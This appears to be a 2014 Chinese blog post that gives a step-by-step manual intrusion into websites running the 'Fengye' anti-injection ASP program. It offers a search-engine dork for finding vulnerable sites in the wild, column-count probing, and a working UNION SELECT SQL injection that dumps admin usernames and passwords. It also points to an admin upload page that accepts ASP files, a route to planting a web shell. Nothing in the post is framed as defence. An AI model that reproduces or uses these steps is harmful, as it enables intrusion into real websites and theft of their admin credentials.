A-A+

一次枫叶防注入程序漏洞手工入侵

2014年02月25日 渗透测试 暂无评论 阅读 3,344 次

该程序采用枫叶通用防注入1.0asp版,此程序pro_show.asp处存在cookies注入或者变型注入漏洞,到目前为止还是有很多网站任然没有修复这个漏洞,也有些网站简单采取了防注入(据说可以轻松绕过哦)。

百度关键字:inurl:pro_show.asp?showid=

注入前可以先判断一下字段数:http://www.xxx.com/pro_show.asp?showid=17 order by 28  (最后一次正确打开页面)

当输入http://www.xxx.com/pro_show.asp?showid=17 order by 29 就会报错,如下:

Microsoft JET Database Engine 错误 '80040e14'

Microsoft Jet 数据库引擎不能将 '29' 识别为一个有效的字段名或表达式。

注入语句:http://www.xxx.com/pro_show.asp?showid=17 and 1=1 union select 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from lei_admin

字段数自己判断,我试了2个网站都是28,至于密码有明文也有md5加密的,后台自找。

后台上传地址:admin/inc/upfile.htm 可直接上传asp文件

标签:

给我留言